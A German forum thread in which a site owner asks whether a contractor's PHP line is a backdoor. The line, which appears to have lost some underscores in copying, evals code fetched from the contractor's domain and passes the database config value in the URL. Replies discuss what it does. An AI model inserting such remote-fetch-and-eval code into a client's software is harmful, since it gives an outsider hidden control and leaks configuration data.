Programmierer der Daten ausliest?!

[marco030]

Hi weiß einer von euch, ob ein externer Programmierer, der einen Auftrag für die Programmierung einer Webseite von uns erhalten hat, unerlaubte Daten auslesen darf?

Folgender Fall: In unserer index.php ist folgendes enthalten:

<?php define('RETURNTYPE', isset($REQUEST['return']) ? $REQUEST['return'] : 'html');

include_once('inc/config.inc');

eval("?>" . filegetcontents('http://DOMAINNAME/header.inc.php?load=UNSERE-WEBSEITE.app&base=&#039;.Config::$db_base) . "<?");

Meiner Meinung nach ist das doch strafbar oder? Wenn ja, wie kann man den belangen?

Nicht wurde diesbezüglich besprochen. Hält er sich da eine Hintertür offen, oder sehe ich das alles falsch?

Gruß

[Elradon]

Ich glaub du interpretierst den PHP-Code falsch Frag mal in einem PHP-Forum nach oder schau dir die Beschreibungen der ganzen Funktionen an.

[marco030]

na was sagt es denn deiner Meinung nach aus?

Sehe ich es nicht richtig, dass er die config datei ausliest und sich auf seinem server runter zieht?

lg

[Elradon]

Ah ich seh grad, DOMAINNAME ist die Domain von dem Programmierer, nicht eure ne?

Was kommt denn, wenn du die URL aufrufst? Schon mal den Programmierer drauf angesprochen?

[marco030]

jo der Domainname ist vom Programmierer. Ich hab den noch nicht drauf angesprochen, da ich der Meinung bin, dass ich ihn notfalls anzeigen kann und er diesen Code dann schnell wieder löscht.

Weißt du, inwieweit er sich strafbar macht?

lg

[marco030]

Wenn man den Link verfolgt kommt folgendes:

<?php

/// Configuration
include_once('inc/config.inc');

define('SITE_ROOT', dirname($_SERVER['SCRIPT_FILENAME']).'/');
define('WWW_ROOT', dirname($_SERVER['SCRIPT_NAME']));

/// Start Session
session_set_cookie_params(0, WWW_ROOT);
session_start();

?>